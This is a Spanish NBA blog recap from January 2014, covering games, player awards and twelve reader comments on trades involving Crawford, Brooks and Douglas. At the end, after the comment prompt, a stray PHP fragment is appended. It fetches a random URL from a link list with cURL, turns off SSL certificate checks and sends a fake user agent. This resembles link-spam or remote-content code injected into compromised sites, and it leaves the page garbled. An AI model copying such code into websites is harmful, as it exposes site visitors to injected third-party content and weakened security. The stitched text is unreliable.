La Crónica: Frank Vogel estará en el All Star

15 de January de 2014 por txusma

Los Pacers consiguieron su trigésima victoria y de paso, aseguraron la presencia de su entrenador en el evento que ha de celebrarse en New Orleans de aquí a un mes ya que serán, sí o sí, el equipo del Este con mejor balance el día 2 de febrero, día en que se definirán los entrenadores de ambas conferencias. En la previa del Sacramento-Indiana alguien podía apostar por un partido igualado ya que los Kings se estaban mostrando como uno de los equipos más en forma de la liga de la mano de un Demarcus Cousins que parece haber alcanzado su cénit como jugador. Cousins cumplió pero los Pacers demostraron que están a otro nivel. Su enorme defensa ahogó el juego ofensivo de los de Mike Malone y Paul George amarró el triunfo con una gran segunda parte (92-116). Lección para unos Kings que de aprender a defender estarían luchando claramente por posiciones de playoffs.

Los que empiezan su particular cruzada para estar en la postemporada son los Grizzlies a los que la vuelta de su mejor jugador, Marc Gasol, dio alas ante los Thunder. Con Courtney Lee particularmante acertado y Zach Randolph declarándose amo y señor de las zonas, los locales se impusieron a los 37 puntos de Kevin Durant. El partido llegó igualado a los instantes finales gracias a un triple de Serge Ibaka a falta de 4 segundos que puso a solo un punto pero Lee acertó con sus 2 tiros libres y el triple a la desesperada de Reggie Jackson no entró (87-90). 

En LA, los Cavs vencieron a los Lakers en un partido en que ambos equipos olvidaron las defensas en casa. En la primera parte los locales pudieron correr y llegaron a acumular hasta 11 puntos de ventaja pero en la segunda Cleveland paró sus contraataques y calibraron su tiro. Acabaron con 13 de 17 en tiros de 3 con Luol Deng destacado con un 5 de 5. Los Cavs se distanciaron definitivamente en el marcador a la mitad del último cuarto y los Lakers ya solo pudieron maquillar el resultado (120-118).

Y finalmente, los Bobcats se impusieron a los Knicks en un duelo directo (quien lo iba a decir a principio de temporada) por los Playoffs. New York no pudo hacer nada ante el huracán Al Jefferson y cayó claramente (98-108).

PREMIOS

MVP: Los Knicks no encontraron en ningún momento la respuesta al juego de Al Jefferson. El fichaje estrella de los Bobcats jugó su mejor partido de la temporada con 35 puntos y 8 rebotes.

Rookie: Tim Hardaway Jr. sigue pescando en el río revuelto que es la posición de escolta de los Knicks. Ayer anotó 12 puntos.

Sorpresa: 2º partido de titular y Courtney Lee ya fue el máximo anotador de los Grizzlies con 24 puntos. En LA, Jodie Meeks se medio disfrazó de Kobe y anotó 26 puntos, incluyendo canastas como esta. Su compañero,Kendall Marshall sigue a lo suyo. De no tener equipo a repartir 16 asistencias como base titular de los Lakers.

Decepción: Los Kings se toparon de bruces contra la muralla de Indiana. El que más sufrió fue Isaiah Thomas  que se quedó en 7 puntos y  1 asistencia  a la vez que contabilizaba  3 pérdidas.

Esfuerzo en vano: Kevin Durant empieza a ser más habitual de este sección de lo que a él le gustaría. Ayer, los Thunder volvieron a perder a pesar de sus 37 puntos. Demarcus Cousins jugó incluso un mejor partido (31 puntos y 13 rebotes) pero los Pacers fueron demasiado para los Kings.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. rumbero dice:
    #1

    Balance de 10-13 han acumulado los Grizzlies sin Marc. La verdad es que yo pensaba que lo iban a acusar más y que les iba a costar los PO, pero están en ese grupo que pelea por la octava plaza. Falta por ver si intentan algún movimiento viendo el buen nivel que ha mostrado la batería de interiores durante este tiempo

      Citar

  2. Denise dice:
    #2

    Turkoglu a Clippers.

    Me parece un buen refuerzo para los angelinos. Si se arrastra por la pista y no hace nada, no pasa nada, cobrará el mínimo. Si es capaz de aportar minutos de calidad, ya se puede considerar un robo. Dicho de otra manera, con este movimiento los Clippers no pierden nada y pueden ganar algo.

      Citar

  3. Mamba_Blanca dice:
    #3

    Jordan Crawford y Marshon Brooks a Warriors, Joel Anthony a Boston y Toney Douglas a Miami Heat. También rondas del draft implicadas para Boston

    Por si les faltaba, los Warriors consiguen mas dinamita exterior

      Citar

  4. The wolf dice:
    #4

    Jordan Crawford y M.Brooks a GSW. Joel Anthony y 2 elecciones del draft a Boston. T.Douglas a Miami

      Citar

  5. Denise dice:
    #5

    Yo no entiendo lo de GSW. Es verdad que Crawford está haciendo una gran temporada y, al peso salen ganado cambiandolo por Douglas, pero joder, con Curry, Thompson y todo el arsenal ofensivo del que disponen, creo que era mejor haber apostado por un base-escolta defensivo antes que por un anotador unidimensional como Crawford.

    Para los Heat muy bueno económicamente, y esto creo que acerca más a Bynum a Miami. Y ojo con los Celtics que están coleccionando rondasa muerte, y a poco que acierten en el Draft, en 3 años tienen un equipazo bonito, bueno y barato.

      Citar

  6. Denise dice:
    #6

    A todo esto, sensacional de momento Courtney Lee. Fui y sigo siendo bastante critico con el rendimiento que tendría el trade para Memphis pero de momento les está saliendo bien.

      Citar

  7. Vader dice:
    #7

    Dios cuantas rondas tiene ya Boston en los próximos años…

      Citar

  8. Ruxixon dice:
    #8

    Hombre,mirando el año pasado,no era para nada Jack un tio con buena defensa,así que con este cambio,para mí,salen ganando porque recuperan esa esencia del año pasado.Y en principio el estilo de los Warriors casa con su estilo.Ahora habrá que ver en qué medida le dan minuto.

    Viendo como es el equipo y el ambiente en el Oracle,puede ser un tio que caiga de pm desde el primer minuto como ser considerado un pufo de cuidado.A mí me gusta pero creo que es un tipo que necesita cierto tiempo para aclimatarse.

      Citar

  9. rumbero dice:
    #9

    A mi de primeras el cambio Douglas por Crawford+Brooks sin tener que meter ninguna ronda de por medio me parece bastante bueno la verdad. Y no es que sea un gran admirador de Crawford, pero su temporada con los Celtics estaba siendo muy buena. Le hemos visto más cosas que tirar sin parar como hacía en esos Wizards tan molones con Wall, Young, Blatche y McGee. Como dice Ruxixón habrá que ver como encaja, pero parece más que válido para dar descanso a Curry y Thompson que suelen pegarse unas minutadas de la ostia

      Citar

  10. Luis H. dice:
    #10

    Denise, está bien pensado. El equipo gana muchos enteros y su cinco suplente era el que menos producía de toda la liga. Ahora fíjate cómo queda: Curry-Thompson-Iguodala-Lee-Bogut y pueden entrar Crawford-Brooks-Barnes-Speights-O’Neal. Aparte de algún remiendo puntual con Bazemore, Ezeli cuando esté sano, etc

      Citar

  11. Jose Luis dice:
    #11

    Deer, tenemos un problemilla en la liga hoops segunda división 🙂 tienes un mensaje

      Citar

  12. Denise dice:
    #12

    Luis H.:
    Denise, está bien pensado. El equipo gana muchos enteros y su cinco suplente era el que menos producía de toda la liga. Ahora fíjate cómo queda: Curry-Thompson-Iguodala-Lee-Bogut y pueden entrar Crawford-Brooks-Barnes-Speights-O’Neal. Aparte de algún remiendo puntual con Bazemore, Ezeli cuando esté sano, etc

    Es un equipazo y de hecho dije a principios de temporada que era de largo el equipo mas profundo del campeonato. Pero echo de menos un poco de defensa en el puesto de base porque en playoffs probablemente tendrán que enfrentarse a Paul, Parker, Westbrook Lillard, …y ahí Curry y Crawford van a sufrir mucho en defensa. Tienen a Iguodala de comodín, pero no se hasta que punto es valida esa opción.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>